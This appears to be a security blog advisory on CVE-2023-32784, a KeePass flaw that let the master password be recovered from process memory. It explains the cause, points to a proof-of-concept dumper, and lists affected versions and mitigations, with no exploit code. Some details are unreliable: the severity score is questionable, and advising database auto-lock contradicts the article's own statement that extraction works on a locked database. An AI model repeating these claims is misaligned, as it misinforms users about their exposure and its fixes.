Ethical Hacking

Videos

CVE-2023-32784: Master Password Disclosure in KeePass

July 10, 2023
Muhammad Kamran Hasan
CVE-2023-32784
KeePass Master password
Password manager
Cleartext
Memory vulnerability
Leftover strings
SecureTextBoxEx control
Overwriting technique
String recovery
Patch
Mitigation strategies
Affected versions
CVE-2023-32784: Master Password Disclosure in KeePass

Introduction

KeePass is a popular open-source password manager that is used by millions of people around the world. In May 2023, a vulnerability was discovered in KeePass that could allow an attacker to extract the master password in cleartext from the memory of the process that was running. This vulnerability is known as CVE-2023-32784 and has a CVSS score of 9.8.

Vulnerability Details

The vulnerability is caused by a flaw in the way that KeePass handles leftover strings in memory. When a user types a character into the KeePass master password field, a leftover string is created in memory. This leftover string is not cleared when the user clears the password field.

The leftover string is created by the KeePass SecureTextBoxEx control, which is a custom-developed text box for password entry. The SecureTextBoxEx control uses a technique called "overwriting" to clear the password field. However, this technique does not completely clear the leftover string.

The leftover string can be used to reconstruct the master password by using a technique called "string recovery." String recovery is a process of recovering a string from memory by analyzing the memory dump.

An attacker who can gain access to the memory of the KeePass process can use this leftover string to reconstruct the master password. This can be done even if the KeePass database is locked.

Keepass Password Dumper

The Keepass Password Dumper project on GitHub provides a proof-of-concept exploit for CVE-2023-32784. The exploit uses string recovery to reconstruct the master password from a memory dump.

Affected Versions

The vulnerability affects KeePass versions 2. x prior to 2.53. The patch for this vulnerability was released in KeePass 2.54.

Mitigation Strategies

There are a few things that users can do to mitigate the risk of this vulnerability:

  • Update to KeePass 2.54 or later. This will patch the vulnerability and prevent attackers from extracting the master password from memory.

  • Use a strong master password. A strong master password is at least 12 characters long and contains a mix of uppercase and lowercase letters, numbers, and symbols.

  • Enable the "Lock database after idle" option in KeePass. This will prevent the master password from being stored in memory if KeePass is not being used.

  • Use a password manager that is not affected by this vulnerability. There are many other password managers available that are not affected by this vulnerability. Some examples include Bitwarden, LastPass, and 1Password.

Conclusion

CVE-2023-32784 is a serious vulnerability that could allow an attacker to gain access to all of the passwords stored in a KeePass database. Users should update to KeePass 2.54 or later as soon as possible to mitigate the risk of this vulnerability.

Resources

CVE-2024-48914: Arbitrary File Read Vulnerability in Vendure
CVE-2024-48914: Arbitrary File Read Vulnerability in Vendure
2024-10-26
Kamran Hasan
CVE-2022-44268: Arbitrary File Disclosure in ImageMagick
CVE-2022-44268: Arbitrary File Disclosure in ImageMagick
2024-05-26
James McGill
CVE-2021-43798: Path Traversal in Grafana
CVE-2021-43798: Path Traversal in Grafana
2024-03-30
James McGill
CVE-2021-3129: Remote Code Execution in Laravel
CVE-2021-3129: Remote Code Execution in Laravel
2024-02-14
James McGill
CVE-2024-28116: Server-Side Template Injection in Grav CMS
CVE-2024-28116: Server-Side Template Injection in Grav CMS
2024-03-24
James McGill
CVE-2022-42889: Remote Code Execution in Apache Commons Text
CVE-2022-42889: Remote Code Execution in Apache Commons Text
2024-01-13
James McGill